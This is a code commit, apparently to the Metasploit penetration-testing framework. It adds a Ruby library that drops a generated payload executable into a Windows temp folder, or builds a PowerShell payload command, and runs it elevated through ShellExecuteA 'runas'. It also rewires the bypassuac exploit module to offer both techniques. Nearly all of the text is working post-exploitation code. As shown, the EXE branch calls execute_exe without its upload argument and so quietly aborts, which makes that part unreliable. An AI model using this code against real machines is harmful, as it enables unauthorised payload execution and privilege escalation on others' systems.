Added PSH option if UAC is turned off

jamesbcook · jamesbcook · commit 84999115d7e6 · 2013-10-25T14:37:12.000-07:00
This will give the option to drop an exe or use psh if uac is turned
off.  The lib can be used for post exploitation to drop an exe or use
powershell and then execute it with the runas command.  I have used the
lib for both bypassuac and ask.
diff --git a/lib/msf/core/post/windows/runas.rb b/lib/msf/core/post/windows/runas.rb
@@ -0,0 +1,37 @@
+# -*- coding: binary -*-
+
+require 'msf/core/exploit/powershell'
+require 'msf/core/exploit/exe'
+
+module Msf::Post::Windows::Runas
+
+  include Msf::Post::File
+  include Msf::Exploit::EXE
+  include Msf::Exploit::Powershell
+
+  def execute_exe(filename=nil,path=nil,upload=nil)
+    exe_payload = generate_payload_exe
+    payload_filename = filename || Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
+    payload_path = path || expand_path("%TEMP%")
+    cmd_location = "#{payload_path}\\#{payload_filename}"
+    if upload
+      print_status("Uploading #{payload_filename} - #{exe_payload.length} bytes to the filesystem...")
+      write_file(cmd_location, exe_payload)
+    else
+      print_error("No Upload Path!")
+      return
+    end
+    command,args = cmd_location,nil
+    shell_exec(command,args)
+  end
+
+  def execute_psh
+    command,args = "cmd.exe",  " /c #{cmd_psh_payload(payload.encoded)}"
+    shell_exec(command,args)
+  end
+
+  def shell_exec(command,args)
+    print_status("Executing Command!")
+    session.railgun.shell32.ShellExecuteA(nil,"runas",command,args,nil,5)
+  end
+end
diff --git a/modules/exploits/windows/local/bypassuac.rb b/modules/exploits/windows/local/bypassuac.rb
@@ -4,14 +4,12 @@
 ##
 
 require 'msf/core'
-require 'msf/core/exploit/exe'
 
 class Metasploit3 < Msf::Exploit::Local
   Rank = ExcellentRanking
 
-  include Exploit::EXE
-  include Post::File
   include Post::Windows::Priv
+  include Post::Windows::Runas
 
   def initialize(info={})
     super( update_info( info,
@@ -37,17 +35,19 @@ def initialize(info={})
       'DisclosureDate'=> "Dec 31 2010"
     ))
 
+    register_options([
+      OptEnum.new("TECHNIQUE", [ true, "Technique to use if UAC is turned off", 'EXE', ['PSH', 'EXE'] ]),
+    ])
+
   end
 
   def runas_method
-    payload = generate_payload_exe
-    payload_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
-    tmpdir = expand_path("%TEMP%")
-    tempexe = tmpdir + "\\" + payload_filename
-    write_file(tempexe, payload)
-    print_status("Uploading payload: #{tempexe}")
-    session.railgun.shell32.ShellExecuteA(nil,"runas",tempexe,nil,nil,5)
-    print_status("Payload executed")
+    case datastore["TECHNIQUE"]
+      when "EXE"
+        execute_exe
+      when "PSH"
+        execute_psh
+    end
   end
 
   def exploit
